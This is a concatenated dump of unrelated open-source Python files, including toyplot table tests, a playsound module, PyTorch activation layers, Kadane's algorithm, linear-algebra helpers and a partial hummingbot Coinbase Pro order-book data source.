nose.tools.assert_equal(context.data.shape, (10, 3))
@then(u'columns can be retrieved by name')
def step_impl(context):
numpy.testing.assert_array_equal(context.data["a"], numpy.arange(10))
@then(u'partial columns can be retrieved by name and index')
def step_impl(context):
nose.tools.assert_equal(context.data["a", 5], 5)
@then(u'partial columns can be retrieved by name and slice')
def step_impl(context):
numpy.testing.assert_array_equal(context.data["a", 5:7], [5, 6])
@then(u'partial tables can be retrieved by row index')
def step_impl(context):
table = context.data[5]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (1, 3))
numpy.testing.assert_array_equal(table["a"], [5])
@then(u'partial tables can be retrieved by row slice')
def step_impl(context):
table = context.data[5:7]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (2, 3))
numpy.testing.assert_array_equal(table["a"], [5,6])
@then(u'partial tables can be retrieved by row index and column name')
def step_impl(context):
table = context.data[5, "b"]
nose.tools.assert_equal(list(table.keys()), ["b"])
nose.tools.assert_equal(table.shape, (1, 1))
numpy.testing.assert_array_equal(table["b"], [25])
@then(u'partial tables can be retrieved by row slice and column name')
def step_impl(context):
table = context.data[5:7, "b"]
nose.tools.assert_equal(list(table.keys()), ["b"])
nose.tools.assert_equal(table.shape, (2, 1))
numpy.testing.assert_array_equal(table["b"], [25,36])
@then(u'partial tables can be retrieved by row index and column names')
def step_impl(context):
table = context.data[5, ["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (1, 2))
numpy.testing.assert_array_equal(table["a"], [5])
@then(u'partial tables can be retrieved by row slice and column names')
def step_impl(context):
table = context.data[5:7, ["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (2, 2))
numpy.testing.assert_array_equal(table["a"], [5,6])
@then(u'partial tables can be retrieved by column names')
def step_impl(context):
table = context.data[["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (10, 2))
@then(u'partial tables can be retrieved by row indices')
def step_impl(context):
table = context.data[[5, 7]]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (2, 3))
numpy.testing.assert_array_equal(table["a"], [5, 7])
@then(u'columns can be replaced by name')
def step_impl(context):
context.data["c"] = numpy.ones(10)
nose.tools.assert_equal(list(context.data.keys()), ["a", "b", "c"])
nose.tools.assert_equal(context.data.shape, (10, 3))
numpy.testing.assert_array_equal(context.data["c"], [1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and separate index')
def step_impl(context):
context.data["c"][0] = 0
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 1, 1, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and separate slice')
def step_impl(context):
context.data["c"][1:4] = [1, 2, 3]
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and index')
def step_impl(context):
context.data["c", 4] = 4
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 4, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and slice')
def step_impl(context):
context.data["c", 5:8] = [5, 6, 7]
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 4, 5, 6, 7, 1, 1])
@then(u'partial columns can be masked by name and index')
def step_impl(context):
context.data["c", 3] = numpy.ma.masked
nose.tools.assert_is(context.data["c"][3], numpy.ma.masked)
@then(u'partial columns can be masked by name and slice')
def step_impl(context):
context.data["c", 8:10] = numpy.ma.masked
nose.tools.assert_is(context.data["c"][8], numpy.ma.masked)
nose.tools.assert_is(context.data["c"][9], numpy.ma.masked)
@then(u'deleting columns should change the table')
def step_impl(context):
del context.data["c"]
nose.tools.assert_equal(list(context.data.keys()), ["a", "b"])
nose.tools.assert_equal(context.data.shape, (10, 2))
@then(u'new columns must have a string name')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data[3] = numpy.arange(10)
@then(u'new columns must have the same number of rows as existing columns')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data["c"] = numpy.random.random(4)
@then(u'new columns must be one-dimensional')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data["c"] = numpy.random.random((10, 4))
@then(u'per-column metadata can be specified')
def step_impl(context):
nose.tools.assert_equal(context.data.metadata("b"), {})
context.data.metadata("b")["foo"] = True
nose.tools.assert_equal(context.data.metadata("b"), {"foo": True})
with nose.tools.assert_raises(ValueError):
context.data.metadata("c")
@then(u'the table can be converted to a numpy matrix')
def step_impl(context):
matrix = context.data.matrix()
numpy.testing.assert_array_equal(matrix, [[0,0],[1,1],[2,4],[3,9],[4,16],[5,25],[6,36],[7,49],[8,64],[9,81]])
@when(u'toyplot.data.Table is initialized with nothing')
def step_impl(context):
context.data = toyplot.data.Table()
@then(u'the toyplot.data.Table is empty')
def step_impl(context):
nose.tools.assert_equal(len(context.data), 0)
nose.tools.assert_equal(context.data.shape, (0, 0))
nose.tools.assert_equal(list(context.data.items()), [])
nose.tools.assert_equal(list(context.data.keys()), [])
nose.tools.assert_equal(list(context.data.values()), [])
@when(u'toyplot.data.Table is initialized with a toyplot.data.Table')
def step_impl(context):
table = toyplot.data.Table()
table["a"] = numpy.arange(10)
table["b"] = table["a"] ** 2
context.data = table
@when(
u'toyplot.data.Table is initialized with an OrderedDict containing columns')
def step_impl(context):
context.data = collections.OrderedDict(
[("a", numpy.arange(10)), ("b", numpy.arange(10) ** 2)])
@then(u'the toyplot.data.Table contains the columns')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["a", "b"])
numpy.testing.assert_array_equal(
table["a"], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
numpy.testing.assert_array_equal(
table["b"], [0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
@when(u'toyplot.data.Table is initialized with a dict containing columns')
def step_impl(context):
context.data = {"b": numpy.arange(10) ** 2, "a": numpy.arange(10)}
@then(u'the toyplot.data.Table contains the columns, sorted by key')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["a", "b"])
numpy.testing.assert_array_equal(
table["a"], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
numpy.testing.assert_array_equal(
table["b"], [0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
@when(u'toyplot.data.Table is initialized with a sequence of name, column tuples')
def step_impl(context):
context.data = [("a", numpy.arange(10)), ("b", numpy.arange(10) ** 2)]
@when(u'toyplot.data.Table is initialized with a matrix')
def step_impl(context):
context.data = numpy.arange(16).reshape((4, 4))
@then(u'the toyplot.data.Table contains the matrix columns with generated keys')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["0", "1", "2", "3"])
numpy.testing.assert_array_equal(
table["0"], [0, 4, 8, 12])
numpy.testing.assert_array_equal(
table["1"], [1, 5, 9, 13])
numpy.testing.assert_array_equal(
table["2"], [2, 6, 10, 14])
numpy.testing.assert_array_equal(
table["3"], [3, 7, 11, 15])
@when(u'toyplot.data.Table is initialized with an array')
def step_impl(context):
context.data = numpy.arange(16)
@when(u'toyplot.data.Table is initialized with an integer')
def step_impl(context):
context.data = 5
@then(u'the toyplot.data.Table raises ValueError')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
toyplot.data.Table(context.data)
@given(u'a toyplot.data.table with some data')
def step_impl(context):
numpy.random.seed(1234)
context.data = toyplot.data.Table()
context.data["foo"] = numpy.arange(10)
context.data["bar"] = numpy.random.random(10)
context.data["baz"] = numpy.random.choice(
["red", "green", "blue"], size=10)
@when(u'toyplot.data.Table is initialized with a csv file')
def step_impl(context):
context.data = toyplot.data.read_csv(toyplot.data.temperatures.path)
@then(u'the toyplot.data.Table contains the csv file columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
for column in context.data.values():
nose.tools.assert_true(issubclass(column.dtype.type, numpy.character))
@when(u'toyplot.data.Table is initialized with a csv file and conversion')
def step_impl(context):
context.data = toyplot.data.read_csv(toyplot.data.temperatures.path, convert=True)
@then(u'the toyplot.data.Table contains the csv file columns with numeric type')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
for column, column_type in zip(context.data.values(), [numpy.character, numpy.character, numpy.integer, numpy.integer, numpy.integer, numpy.integer]):
nose.tools.assert_true(issubclass(column.dtype.type, column_type))
@when(u'toyplot.data.Table is initialized with a pandas dataframe')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path))
@then(u'the toyplot.data.Table contains the data frame columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with index')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path), index=True)
@then(u'the toyplot.data.Table contains the data frame columns plus an index column')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 7))
nose.tools.assert_equal(list(context.data.keys()), ["index0", 'STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with hierarchical index')
def step_impl(context):
if pandas_available(context):
index = [numpy.array(["foo", "foo", "bar", "bar"]), numpy.array(["one", "two", "one", "two"])]
data_frame = pandas.DataFrame(numpy.ones((4, 4)), index=index)
context.data = toyplot.data.Table(data_frame, index=True)
@then(u'the toyplot.data.Table contains the data frame columns plus multiple index columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (4, 6))
nose.tools.assert_equal(list(context.data.keys()), ["index0", 'index1', '0', '1', '2', '3'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with hierarchical index and custom index format')
def step_impl(context):
if pandas_available(context):
index = [numpy.array(["foo", "foo", "bar", "bar"]), numpy.array(["one", "two", "one", "two"])]
data_frame = pandas.DataFrame(numpy.ones((4, 4)), index=index)
context.data = toyplot.data.Table(data_frame, index="Index {}")
@then(u'the toyplot.data.Table contains the data frame columns plus multiple custom format index columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (4, 6))
nose.tools.assert_equal(list(context.data.keys()), ["Index 0", 'Index 1', '0', '1', '2', '3'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with duplicate column names')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path)[["STATION", "DATE", "STATION", "DATE", "DATE"]])
@then(u'the toyplot.data.Table contains the data frame columns with uniqified column names')
def step_impl(context):
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'DATE', 'STATION-1', 'DATE-1', 'DATE-2'])
@then(u'the table can be rendered as format ipython html string')
def step_impl(context):
html = context.data._repr_html_()
nose.tools.assert_is_instance(html, str)
testing.assert_html_equal(html, "data-table")
|
pydoro/pydoro_core/sound.py | Liupold/pydoro | 403 | 12716633 | """
This file was copied from
https://github.com/TaylorSMarks/playsound
playsound.py - For playing audio file, Copyright (c) 2016 <NAME>
MIT License
----
I've added async play for Linux using a thread and changed names to be more Pythonic.
I've also added a thin wrapper around pygame.
"""
from platform import system
system = system()
class PlayException(Exception):
pass
def _play_sound_win(sound, block=True):
"""
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) <NAME> <<EMAIL>>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
"""
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def win_cmd(*command):
buf = c_buffer(255)
command = " ".join(command).encode(getfilesystemencoding())
err_code = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if err_code:
error_buffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(err_code, error_buffer, 254)
exception_message = (
"\n Error " + str(err_code) + " for command:"
"\n " + command.decode() + "\n " + error_buffer.value.decode()
)
raise PlayException(exception_message)
return buf.value
alias = "playsound_" + str(random())
win_cmd('open "' + sound + '" alias', alias)
win_cmd("set", alias, "time format milliseconds")
duration_ms = win_cmd("status", alias, "length")
win_cmd("play", alias, "from 0 to", duration_ms.decode())
if block:
sleep(float(duration_ms) / 1000.0)
def _play_sound_osx(sound, block=True):
"""
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
"""
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
if "://" not in sound:
if not sound.startswith("/"):
from os import getcwd
sound = getcwd() + "/" + sound
sound = "file://" + sound
url = NSURL.URLWithString_(sound)
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if not nssound:
raise IOError("Unable to load sound named: " + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _play_sound_nix_blocking(sound):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
# pathname2url escapes non-URL-safe characters
import os
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version("Gst", "1.0")
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make("playbin", "playbin")
if sound.startswith(("http://", "https://")):
playbin.props.uri = sound
else:
playbin.props.uri = "file://" + pathname2url(os.path.abspath(sound))
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlayException("playbin.set_state returned " + repr(set_result))
bus = playbin.get_bus()
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
playbin.set_state(Gst.State.NULL)
def _play_sound_nix_no_except(sound):
# noinspection PyBroadException
try:
_play_sound_nix(sound)
except:
pass
def _play_sound_nix(sound, block=True):
if block:
_play_sound_nix_blocking(sound)
return
from threading import Thread
thread = Thread(target=_play_sound_nix_no_except, args=(sound,), daemon=True)
thread.start()
def _play_sound_pygame_blocking(sound):
from pygame import mixer
import time
mixer.init()
mixer.music.load(sound)
mixer.music.play()
while mixer.music.get_busy():
time.sleep(0.1)
def _play_sound_pygame(sound, block=True):
if block:
_play_sound_pygame_blocking(sound)
return
from threading import Thread
thread = Thread(target=_play_sound_pygame_blocking, args=(sound,), daemon=True)
thread.start()
if system == "Windows":
play = _play_sound_win
elif system == "Darwin":
play = _play_sound_osx
else:
# For linux this will try following libraries
# 1) if pygame can be imported use it
# 2) if pygame cannot be imported use PyGObject
try:
import pygame as try_pygame
play = _play_sound_pygame
del try_pygame
except ImportError:
play = _play_sound_nix
del system
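# Example usage sketch (import path inferred from this file's location; the audio file
# name is an assumption):
#   from pydoro.pydoro_core import sound
#   sound.play("alarm.wav")               # blocking playback
#   sound.play("alarm.wav", block=False)  # returns immediately, plays in the background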
|
fastreid/layers/activation.py | tenghehan/reid_without_id | 2,194 | 12716719 | # encoding: utf-8
"""
@author: <NAME>
@contact: <EMAIL>
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = [
'Mish',
'Swish',
'MemoryEfficientSwish',
'GELU']
class Mish(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
# inlining this saves 1 second per epoch (V100 GPU) vs having a temp x and then returning x(!)
return x * (torch.tanh(F.softplus(x)))
class Swish(nn.Module):
def forward(self, x):
return x * torch.sigmoid(x)
class SwishImplementation(torch.autograd.Function):
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
i = ctx.saved_variables[0]
sigmoid_i = torch.sigmoid(i)
return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class MemoryEfficientSwish(nn.Module):
def forward(self, x):
return SwishImplementation.apply(x)
class GELU(nn.Module):
"""
Paper Section 3.4, last paragraph notice that BERT used the GELU instead of RELU
"""
def forward(self, x):
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
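
# Minimal sanity-check sketch for the activations above; the tensor shape is
# an arbitrary assumption chosen only for illustration.
if __name__ == '__main__':
    x = torch.randn(2, 3)
    for act in (Mish(), Swish(), MemoryEfficientSwish(), GELU()):
        y = act(x)
        assert y.shape == x.shape  # all of these activations are elementwise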
|
test_network_tensorflow.py | lFatality/tensorflow2caffe | 115 | 12716732 | <gh_stars>100-1000
import numpy as np
import cv2
from model import vgg_net_19, vgg_net_19_activations
MODEL_SAVE_PATH = 'vgg_net_19.model'
IMG_NAME = 'test_img.png'
WIDTH = 112
HEIGHT = 112
#for testing a vector output
def test_model_vector_output():
#load architecture and parameters
model = vgg_net_19(WIDTH, HEIGHT)
model.load(MODEL_SAVE_PATH)
#load image, add batch size and predict
image = cv2.imread(IMG_NAME)
image = image.reshape(1, HEIGHT, WIDTH, 3)
output = model.predict(image)
print(output)
#for testing a tensor output (will output caffe format)
def test_model_tensor_output():
#load architecture and parameters
model = vgg_net_19_activations(WIDTH, HEIGHT)
model.load(MODEL_SAVE_PATH)
#load image, add batch size and predict
image = cv2.imread(IMG_NAME)
image = image.reshape(1, HEIGHT, WIDTH, 3)
output = model.predict(image)
#conversion to caffe format
#output format tensor:
#Tensorflow: [batch size (0), height (1), width (2), depth (3)]
#Caffe: [batch size (0), depth (3), height (1), width (2)]
output = output.transpose((0,3,1,2))
print(output)
#test_model_vector_output()
test_model_tensor_output() |
Maximum_Subarray/Python/shivam5992/kadane.py | Mynogs/Algorithm-Implementations | 1,184 | 12716742 | <filename>Maximum_Subarray/Python/shivam5992/kadane.py
from random import shuffle
'''
The maximum subarray problem is the task of finding the contiguous subarray within a
1D array of numbers (containing at least one positive number) which has the largest sum.
The following implementation uses the dynamic programming approach
(Kadane's algorithm). Time complexity is O(n).
'''
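# Worked example: for [-2, 1, -3, 4, -1, 2, 1, -5, 4] the maximum-sum
# contiguous subarray is [4, -1, 2, 1], so kadane(...) returns 6.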
def kadane(arr):
size = len(arr)
curr_max = arr[0]
max_so_far = arr[0]
for i in range(1, size):
curr_max = max(curr_max+arr[i],arr[i])
max_so_far = max(curr_max,max_so_far)
return max_so_far
if __name__ == '__main__':
array = list(range(10, -10, -1))
shuffle(array)
    print("List: " + str(array))
    print("Maximum Sum of SubArrays: ")
    response = kadane(array)
    print(response)
|
tests/engine/test_engine.py | hanqiu-hq/cvpods | 758 | 12716749 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from torch import nn
from cvpods.engine import SimpleRunner
from torch.utils.data import Dataset
class SimpleDataset(Dataset):
def __init__(self, length=100):
self.data_list = torch.rand(length, 3, 3)
def __getitem__(self, index):
return self.data_list[index]
class SimpleModel(nn.Sequential):
def forward(self, x):
return {"loss": x.sum() + sum([x.mean() for x in self.parameters()])}
class TestTrainer(unittest.TestCase):
def test_simple_trainer(self, device="cpu"):
device = torch.device(device)
model = SimpleModel(nn.Linear(10, 10)).to(device)
class DataLoader:
def __len__(self):
return 10000
def __iter__(self):
while True:
yield torch.rand(3, 3).to(device)
trainer = SimpleRunner(model, DataLoader(), torch.optim.SGD(model.parameters(), 0.1))
trainer.max_epoch = None
trainer.train(0, 0, 10)
return trainer
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_simple_trainer_cuda(self):
self.test_simple_trainer(device="cuda")
|
neo/Network/flightinfo.py | volekerb/neo-python | 387 | 12716847 | from datetime import datetime
class FlightInfo:
def __init__(self, node_id, height):
self.node_id: int = node_id
self.height: int = height
self.start_time: int = datetime.utcnow().timestamp()
def reset_start_time(self):
self.start_time = datetime.utcnow().timestamp()
|
quaternion/setup3d.py | IhorNehrutsa/micropython-samples | 268 | 12716849 | <reponame>IhorNehrutsa/micropython-samples
# setup3d.py
# Hardware specific setup for 3D demos
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 <NAME>
from machine import I2C, SPI, Pin
import gc
# This module must export the following functions
# fill(color) Fill the buffer with a color
# line(xs, ys, xe, ye, color) Draw a line to the buffer
# show() Display result
# Also dimension bound variable.
from ssd1351_16bit import SSD1351 as SSD
_HEIGHT = const(128) # SSD1351 variant in use
# IMU driver for test_imu only. With other IMU's the fusion module
# may be used for quaternion output.
# https://github.com/micropython-IMU/micropython-fusion
from bno055 import BNO055
# Initialise IMU
i2c = I2C(2)
imu = BNO055(i2c)
# Export color constants
WHITE = SSD.rgb(255, 255, 255)
GREY = SSD.rgb(100, 100, 100)
GREEN = SSD.rgb(0, 255, 0)
BLUE = SSD.rgb(0, 0, 255)
RED = SSD.rgb(255, 0, 0)
YELLOW = SSD.rgb(255, 255, 0)
CYAN = SSD.rgb(0, 255, 255)
# Initialise display
# Monkey patch size of square viewing area. No. of pixels for a change of 1.0
# Viewing area is 128*128
DIMENSION = 64
gc.collect()
_pdc = Pin('X1', Pin.OUT_PP, value=0) # Pins are for Pyboard
_pcs = Pin('X2', Pin.OUT_PP, value=1)
_prst = Pin('X3', Pin.OUT_PP, value=1)
_spi = SPI(2) # scl Y9 sda Y10
_ssd = SSD(_spi, _pcs, _pdc, _prst, height=_HEIGHT) # Create a display instance
line = _ssd.line
fill = _ssd.fill
show = _ssd.show
def setup():
return _ssd
|
banpei/utils.py | Mee-Panyar-Clinic/banpei | 274 | 12716857 | <reponame>Mee-Panyar-Clinic/banpei
import numpy as np
def power_method(A, iter_num=1):
"""
Calculate the first singular vector/value of a target matrix based on the power method.
Parameters
----------
A : numpy array
Target matrix
iter_num : int
Number of iterations
Returns
-------
u : numpy array
first left singular vector of A
s : float
first singular value of A
v : numpy array
first right singular vector of A
"""
# set initial vector q
q = np.random.normal(size=A.shape[1])
q = q / np.linalg.norm(q)
for i in range(iter_num):
q = np.dot(np.dot(A.T, A), q)
v = q / np.linalg.norm(q)
Av = np.dot(A, v)
s = np.linalg.norm(Av)
u = Av / s
return u, s, v
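
# Usage sketch for power_method (illustrative only; the matrix size and
# iteration count are arbitrary assumptions):
#
#   A = np.random.rand(20, 5)
#   u, s, v = power_method(A, iter_num=50)
#   # s should approximate the largest singular value of A:
#   print(s, np.linalg.svd(A, compute_uv=False)[0])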
def tridiagonalize_by_lanczos(P, m, k):
"""
    Tridiagonalize a matrix by the Lanczos method
Parameters
----------
P : numpy array
Target matrix
    m : numpy array
        Initial vector
k : int
Size of the tridiagonal matrix
Returns
-------
T : numpy array
tridiagonal matrix
"""
# Initialize variables
T = np.zeros((k, k))
r0 = m
beta0 = 1
q0 = np.zeros(m.shape)
for i in range(k):
q1 = r0 / beta0
C = np.dot(P, q1)
alpha1 = np.dot(q1, C)
r1 = C - alpha1 * q1 - beta0 * q0
beta1 = np.linalg.norm(r1)
T[i, i] = alpha1
if i + 1 < k:
T[i, i + 1] = beta1
T[i + 1, i] = beta1
q0 = q1
beta0 = beta1
r0 = r1
return T
def tridiag_eigen(T, iter_num=1, tol=1e-3):
"""
Calculate eigenvalues and eigenvectors of tridiagonal matrix
Parameters
----------
    T : numpy array
        Target matrix (tridiagonal)
iter_num : int
Number of iterations
tol : float
Stop iteration if the target matrix converges to a diagonal matrix with acceptable tolerance `tol`
Returns
-------
eigenvalue : numpy array
Calculated eigenvalues
eigenvectors : numpy array
Calculated eigenvectors
"""
eigenvectors = np.identity(T.shape[0])
for i in range(iter_num):
Q, R = tridiag_qr_decomposition(T)
T = np.dot(R, Q)
eigenvectors = np.dot(eigenvectors, Q)
eigenvalue = np.diag(T)
if np.all((T - np.diag(eigenvalue) < tol)):
break
return eigenvalue, eigenvectors
def tridiag_qr_decomposition(T):
"""
QR decomposition for a tridiagonal matrix
Ref. http://www.ericmart.in/blog/optimizing_julia_tridiag_qr
Parameters
----------
T : numpy array
Target matrix (tridiagonal)
Returns
-------
Qt.T : numpy array
R : numpy array
"""
R = T.copy()
Qt = np.eye(T.shape[0])
for i in range(T.shape[0] - 1):
u = householder(R[i:i + 2, i])
M = np.outer(u, u)
R[i:i + 2, :(i + 3)] -= 2 * np.dot(M, R[i:i + 2, :(i + 3)])
Qt[i:i + 2, :(i + 3)] -= 2 * np.dot(M, Qt[i:i + 2, :(i + 3)])
return Qt.T, R
def householder(x):
"""
Householder projection for vector.
Parameters
----------
x : numpy array
Target vector
Returns
-------
x : numpy array
"""
x[0] = x[0] + np.sign(x[0]) * np.linalg.norm(x)
x = x / np.linalg.norm(x)
return x
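
# Usage sketch chaining the helpers above (illustrative only; the matrix
# size, k and the iteration counts are arbitrary assumptions):
#
#   C = np.random.rand(30, 10)
#   P = np.dot(C.T, C)                       # symmetric matrix for Lanczos
#   u, _, _ = power_method(P, iter_num=10)
#   T = tridiagonalize_by_lanczos(P, u, k=5)
#   eigenvalue, eigenvectors = tridiag_eigen(T, iter_num=100)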
|
hummingbot/connector/exchange/coinbase_pro/coinbase_pro_api_order_book_data_source.py | BGTCapital/hummingbot | 3,027 | 12716873 | #!/usr/bin/env python
import asyncio
import logging
import time
from decimal import Decimal
from typing import AsyncIterable, Dict, List, Optional
import pandas as pd
from hummingbot.connector.exchange.coinbase_pro import coinbase_pro_constants as CONSTANTS
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_active_order_tracker import CoinbaseProActiveOrderTracker
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_order_book import CoinbaseProOrderBook
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_order_book_tracker_entry import (
CoinbaseProOrderBookTrackerEntry
)
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_utils import (
CoinbaseProRESTRequest,
build_coinbase_pro_web_assistant_factory
)
from hummingbot.core.data_type.order_book import OrderBook
from hummingbot.core.data_type.order_book_message import OrderBookMessage
from hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource
from hummingbot.core.data_type.order_book_tracker_entry import OrderBookTrackerEntry
from hummingbot.core.utils.async_utils import safe_gather
from hummingbot.core.web_assistant.connections.data_types import RESTMethod, WSRequest
from hummingbot.core.web_assistant.rest_assistant import RESTAssistant
from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory
from hummingbot.core.web_assistant.ws_assistant import WSAssistant
from hummingbot.logger import HummingbotLogger
MAX_RETRIES = 20
NaN = float("nan")
class CoinbaseProAPIOrderBookDataSource(OrderBookTrackerDataSource):
MESSAGE_TIMEOUT = 30.0
PING_TIMEOUT = 10.0
_cbpaobds_logger: Optional[HummingbotLogger] = None
_shared_web_assistants_factory: Optional[WebAssistantsFactory] = None
@classmethod
def logger(cls) -> HummingbotLogger:
if cls._cbpaobds_logger is None:
cls._cbpaobds_logger = logging.getLogger(__name__)
return cls._cbpaobds_logger
def __init__(
self,
trading_pairs: Optional[List[str]] = None,
web_assistants_factory: Optional[WebAssistantsFactory] = None,
):
super().__init__(trading_pairs)
self._web_assistants_factory = web_assistants_factory or build_coinbase_pro_web_assistant_factory()
self._rest_assistant = None
@classmethod
async def get_last_traded_prices(cls, trading_pairs: List[str]) -> Dict[str, Decimal]:
tasks = [cls.get_last_traded_price(t_pair) for t_pair in trading_pairs]
results = await safe_gather(*tasks)
return {t_pair: result for t_pair, result in zip(trading_pairs, results)}
@classmethod
async def get_last_traded_price(cls, trading_pair: str) -> Decimal:
factory = build_coinbase_pro_web_assistant_factory()
rest_assistant = await factory.get_rest_assistant()
endpoint = f"{CONSTANTS.PRODUCTS_PATH_URL}/{trading_pair}/ticker"
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=endpoint)
response = await rest_assistant.call(request)
resp_json = await response.json()
return Decimal(resp_json["price"])
@staticmethod
async def fetch_trading_pairs() -> List[str]:
trading_pair_list = []
try:
factory = build_coinbase_pro_web_assistant_factory()
rest_assistant = await factory.get_rest_assistant()
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=CONSTANTS.PRODUCTS_PATH_URL)
response = await rest_assistant.call(request)
if response.status == 200:
markets = await response.json()
raw_trading_pairs: List[str] = list(map(lambda details: details.get('id'), markets))
trading_pair_list: List[str] = []
for raw_trading_pair in raw_trading_pairs:
trading_pair_list.append(raw_trading_pair)
except Exception:
# Do nothing if the request fails -- there will be no autocomplete for coinbase trading pairs
pass
return trading_pair_list
@staticmethod
async def get_snapshot(rest_assistant: RESTAssistant, trading_pair: str) -> Dict[str, any]:
"""
Fetches order book snapshot for a particular trading pair from the rest API
:returns: Response from the rest API
"""
endpoint = f"{CONSTANTS.PRODUCTS_PATH_URL}/{trading_pair}/book?level=3"
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=endpoint)
response = await rest_assistant.call(request)
if response.status != 200:
raise IOError(f"Error fetching Coinbase Pro market snapshot for {trading_pair}. "
f"HTTP status is {response.status}.")
response_data = await response.json()
return response_data
async def get_new_order_book(self, trading_pair: str) -> OrderBook:
rest_assistant = await self._get_rest_assistant()
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
